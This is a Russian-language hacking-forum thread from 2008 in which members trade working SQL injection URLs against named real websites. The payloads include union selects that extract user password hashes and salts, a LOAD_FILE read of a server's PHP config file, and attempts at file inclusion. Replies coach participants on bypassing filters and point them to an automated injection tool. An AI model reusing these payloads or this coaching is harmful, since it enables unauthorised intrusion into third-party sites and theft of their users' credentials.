 |
|
10.02.2008, 17:43
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Велемир
http://www.sitecom/showcategory.php?cid=7+union+select+0,column_name, 2,3,4+from+site_users.columns+/*
Доступа через селект туда нету,к information_schema.tables есть.
Просмотрел имена таблиц через лимит,напарываюсь на site_users.Там почти 5к юзеров. Подобрал user_id и username, а пароли никак )(.
Кто тебя учил таким запросам? Купи книгу по sql
select column_name from information_schema.columns where table_name = blablabla limit 1,1
|
|
|
10.02.2008, 23:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+sel ect+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2
Эммм...ктонить может объяснить по порядку,как оно сделано о_О ? А то я нириально туплю(первый раз ваапще такое встречаю):Р.Как в таком случае узнать кол.-во строк и таблиц? ) (Можно подробно).Когда я ордер пробую он выдаёт предупреждение )(
|
|
|
|
10.02.2008, 23:48
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от .Slip
Кто тебя учил таким запросам? Купи книгу по sql
select column_name from information_schema.columns where table_name = blablabla limit 1,1
Тот вариант тоже прокатывал, ток я почему-то не угадал user_password, ибо к мускулу доступа не было)(
|
|
|
|
11.02.2008, 00:48
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами:
9785147
Репутация:
137
|
|
Извените за банальный тупой вопрос по пхп инклюдингу. прочол статью по этой теме на античате
вот нашол плохую фильтрацию
http://www.dosuga.net/index.php?type=pic&seq=dfdsfds&mk=on&num=4&tot=92
(уязвима переменная seq)
пробывал подставить в переменную сайт
http://www.dosuga.net/index.php?type=pic&seq=http://www.google.ru&mk=on&num=4&tot=92
ноль эмоций
пробывал разработать как локальный инклюд
http://www.dosuga.net/index.php?type=pic&seq=../index.php&mk=on&num=4&tot=92
тоже ничего
подскажите в чом я ошибся и как разрабатывать эту уязвимость?
Последний раз редактировалось ZET36; 11.02.2008 в 00:51..
|
|
|
|
11.02.2008, 02:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
ошибся ты в том, что тут возможен бы был локальный инклюд, если бы не было экранирования спец символов типа кавычки и нуля, причем как я понял там еще и фильтрация какая то написана, хотя насчет фильтрации хз, но экранирование не дает провести локальный инклюд
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.02.2008, 19:49
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Подскажите пожалуйста, есть какая нибудь прога для подстановки чисел в SQL инъекций, ну а точнее ВОТ прочитал я эту статью, и там написано
Способ №1: Зачастую проверяют на Mysql inj подстановкой в переменную одинарной ковычки:
Код:
http://www.site.ru/index.php?page=1'
Результатом, сведетельствующем о уязвимости должно быть сообщение на странице, что то вроде: MySQL Error: mysql_query(.......) error expretion syntax... Вобщем нечто подобное свидетельствует уже о 99% уязвимости ресурса. Ну вот есть прога для атоматической подстановки чисел?) Я много раз читал эту статью, токо вот с подстановкой не выходит, )
Вручную чтоли делать?)
А эти шаблоны уже заепали) и вправду самому надо думать, а не готовыми инъекциями)
Ну вот такой у меня вопрос, может не внимательно я смотрел на ачате, может есть такая прога?) |
|
|
|
12.02.2008, 19:56
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Sql injection tool by SQLHACK может быть?
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
12.02.2008, 20:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://topofgames.com/index.php?cat_id=72'
Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР
http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*
Дыра есь,но как обойти хз:РР
Последний раз редактировалось Велемир; 12.02.2008 в 20:33..
|
|
|
|
12.02.2008, 21:00
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,LOAD_FILE('/var/www/vhosts/nlstar.net/req/class.db.php')+from+mysql.user/*
код выпадет в исходник
всегда смотри file_priv, дальше советую поискать какие нибудь конфиги или исходники авторизации
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
12.02.2008, 21:07
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
гага,до мя щас ток дошло че делать))))))))).Пасиб те! )если б все так отвечали Ж...
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|
Похожие темы
Линейный вид
